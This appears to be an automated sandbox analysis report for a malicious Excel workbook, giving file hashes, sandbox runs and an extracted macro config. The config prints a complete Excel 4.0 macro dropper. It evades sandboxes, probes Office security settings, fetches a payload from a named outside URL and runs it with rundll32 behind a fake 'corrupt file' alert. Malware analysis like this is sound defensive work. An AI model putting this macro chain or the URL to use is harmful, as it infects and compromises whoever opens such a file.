General
-
Target
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
Size
209KB
-
Sample
200409-41b3rw1bqa
-
MD5
05f0733ab9c8d500e5c8b728b73a359f
-
SHA1
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
SHA256
0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd
-
SHA512
458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829
Static task
static1
Behavioral task
behavioral1
Sample
267a6da880b87fbb3c74e8ef84f469d6795f450c.xls
Resource
win7v200217
Behavioral task
behavioral2
Sample
267a6da880b87fbb3c74e8ef84f469d6795f450c.xls
Resource
win10v200217
Malware Config
Extracted
https://amgdorie.online/avdv42g
-
formulas
=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),) =IF(GET.WORKSPACE(14)<400, CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE)) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5) =WAIT(NOW()+"00:00:03") =FOPEN("c:\users\public\1.reg") =FPOS(R[-1]C, 215) =FREAD(R[-2]C, 255) =FCLOSE(R[-3]C) =FILE.DELETE("c:\users\public\1.reg") =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://amgdorie.online/avdv42g","c:\Users\Public\bug65ef.html",0,0) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\bug65ef.html,DllRegisterServer",0,5) =CLOSE(FALSE) WORKBOOK.HIDE("tBtNRCydwb",TRUE) GOTO(R$0C$18)
Targets
-
-
Target
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
Size
209KB
-
MD5
05f0733ab9c8d500e5c8b728b73a359f
-
SHA1
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
SHA256
0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd
-
SHA512
458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829
Score 1/10 -